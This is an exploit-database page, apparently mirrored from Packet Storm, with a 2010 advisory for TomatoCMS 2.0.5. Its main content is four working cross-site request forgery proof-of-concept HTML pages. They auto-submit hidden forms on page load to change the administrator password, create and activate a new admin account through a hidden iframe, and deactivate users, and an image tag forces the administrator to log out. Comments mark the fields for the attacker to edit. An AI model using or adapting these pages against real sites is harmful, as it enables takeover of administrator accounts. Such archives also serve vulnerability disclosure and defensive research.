Lucene search
K

TomatoCMS 2.0.5 Cross Site Request Forgery

🗓️ 13 Jul 2010 00:00:00Reported by 10n1z3dType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 22 Views

TomatoCMS 2.0.5 Multiple CSRF Vulnerabilities including Change Admin Password, Create Admin User, Deactivate User, and Logout The Administrator exploits

Code
`<!---  
Title: TomatoCMS 2.0.5 Multiple CSRF Vulnerabilities  
Author: 10n1z3d <10n1z3d[at]w[dot]cn>  
Date: Sun 11 Jul 2010 03:36:08 PM EEST  
Vendor: http://www.tomatocms.com/  
Download: None  
--->  
  
-=[ CSRF PoC 1 - Change Administrator Password ]=-  
  
<html>  
<head>  
<title>TomatoCMS 2.0.5 Multiple CSRF Vulnerabilities - Change Admin Password</title>  
</head>  
<body onload="document.csrf.submit();">  
<form name="csrf" action="http://[domain]/index.php/admin/core/user/changepass" method="post">  
<!--- Edit these --->  
<input type="hidden" name="password" value="rootroot" />  
<input type="hidden" name="passwordConfirm" value="rootroot" />  
</form>  
</body>  
</html>   
  
-=[ CSRF PoC 2 - Create Admin User ]=-  
  
<html>  
<head>  
<title>TomatoCMS 2.0.5 Multiple CSRF Vulnerabilities - Create Admin User</title>  
</head>  
<!--- Submit the first form and delay the second one to make sure the POST request is completed --->  
<body onload="document.csrf1.submit();setTimeout('document.csrf2.submit();',5000);">  
<!--- We need this to submit the forms without redirects --->  
<div style="visibility:hidden">  
<iframe name="ipwn" width="20" height="20"></iframe>  
</div>  
  
<!--- Creates the user --->  
<form name="csrf1" target="ipwn" action="http://[domain]/index.php/admin/core/user/add" method="post">  
<!--- Edit these --->  
<input type="hidden" name="full_name" value="root" />  
<input type="hidden" name="username" value="root" />  
<input type="hidden" name="email" value="[email protected]"/>  
<input type="hidden" name="password" value="rootroot"/>  
<input type="hidden" name="password2" value="rootroot" />  
<!--- Do not edit below --->  
<input type="hidden" name="role" value="1" />  
</form>  
  
<!--- Activates the user --->  
<form name="csrf2" target="ipwn" action="http://[domain]/index.php/admin/core/user/activate" method="post">  
<!--- We are not sure about the user id but we can guess :) --->  
<input type="hidden" name="id" value="2" />  
<!--- Do not edit below --->  
<input type="hidden" name="status" value="0" />  
</form>  
</body>  
</html>  
  
-=[ CSRF PoC 3 - Deactivate User ]=-  
  
<html>  
<head>  
<title>TomatoCMS 2.0.5 Multiple CSRF Vulnerabilities - Deactivate User</title>  
</head>  
<body onload="document.csrf.submit();">  
<form name="csrf" action="http://[domain]/index.php/admin/core/user/activate" method="post">  
<!--- Edit this --->  
<input type="hidden" name="id" value="1" />  
<!--- Do not edit below --->  
<input type="hidden" name="status" value="1" />  
</form>  
</body>  
</html>  
  
-=[ CSRF PoC 4 - Logout The Administrator ]=-  
  
<img src="http://[domain]/index.php/core/auth/logout" alt="Do you see this?" />  
  
<!---  
http://www.evilzone.org/  
irc.evilzone.org (6697 / 9999)  
--->  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation